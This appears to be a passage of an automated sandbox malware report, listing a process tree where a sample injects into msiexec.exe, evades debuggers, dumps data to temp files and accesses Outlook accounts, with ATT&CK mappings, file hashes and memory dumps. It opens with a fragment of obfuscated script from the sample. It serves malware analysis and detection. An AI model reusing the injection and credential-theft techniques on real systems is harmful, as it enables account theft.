$TilGN.nlParORa.bUn,as olskd: PhaPu DBasEverQResU seAMelTWo i emo paN s =skr$DevsF nHTr A s M ocokalysl,iMonnPolGKam. MasHybu Lob onssa TL tR .cIBranH,vGs l(W,t$Af f .io W.LUniI,riaKalnRest ar1 a3spr0Inf,Unm$Ti FBraaFibCEksesu,ADagbKlolReceIde)Ced ');Flderandene $Adequation;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\syswow64\msiexec.exe
    C:\Windows\syswow64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jkpwlayhatqmcjp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:972
- - C:\Windows\syswow64\msiexec.exe
    C:\Windows\syswow64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ueuplsriobizexdinim"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1536
- - C:\Windows\syswow64\msiexec.exe
    C:\Windows\syswow64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\eyaaelcccjaeodzmwtyrob"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabD3F4.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD407.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\jkpwlayhatqmcjp

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BYNGN20EID9AL5NW2XXI.temp

Filesize
7KB

MD5
50b8608d3170b21fb96407409973dc99

SHA1
98016ea081e9b2d48a1a0d8bc7a5b717fb2aa26d

SHA256
60d1a04eaa608fc40c4c6e18a908d2cd684fca7c7829070167b48850124b8cba

SHA512
051a6e68e677a1c071d85d726b35cfc5d7a7dd5bbafb4d4f6a73d409eef790f13a7dec8520028f639a9ec9b11fdd5e5ee3ccabaccb224797923aff97eaa3a278

Download Submit
C:\Users\Admin\AppData\Roaming\Vejplade.Agg

Filesize
438KB

MD5
f7ef9f2891ffa6b06eed27bd096f7ea0

SHA1
c436262d099bcea56a945d5afe8ddb4afb24c1c7

SHA256
3a089865224dda711a5aabb337813594e0d44a70897d9a5af6214600c7059691

SHA512
d871dfbd399cb669ef6a5f5b1131b1caf67f81228d8bf522f89d836e45bf2302b32f23535ef006cfcb484cbe73990b2e2ed96cf33455dcec15123dd0376f6540

Download Submit
memory/972-82-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/972-92-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/972-86-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/972-90-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/972-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1084-94-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1084-95-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1084-97-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1084-98-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1536-91-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1536-87-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1536-88-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1536-84-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2020-104-0x0000000002AE0000-0x0000000002AF9000-memory.dmp

Filesize
100KB

Download
memory/2020-108-0x0000000002AE0000-0x0000000002AF9000-memory.dmp

Filesize
100KB

Download
memory/2020-75-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-116-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-115-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-114-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-79-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-113-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-112-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-111-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-110-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-109-0x00000000002B0000-0x0000000001312000-memory.dmp

Filesize
16.4MB

Download
memory/2020-107-0x0000000002AE0000-0x0000000002AF9000-memory.dmp

Filesize
100KB

Download
memory/2480-66-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-59-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

Filesize
4KB

Download
memory/2480-60-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2480-61-0x0000000002230000-0x0000000002238000-memory.dmp

Filesize
32KB

Download
memory/2480-62-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-63-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-64-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-67-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

Filesize
4KB

Download
memory/2480-69-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/3068-73-0x00000000062B0000-0x0000000007384000-memory.dmp

Filesize
16.8MB

Download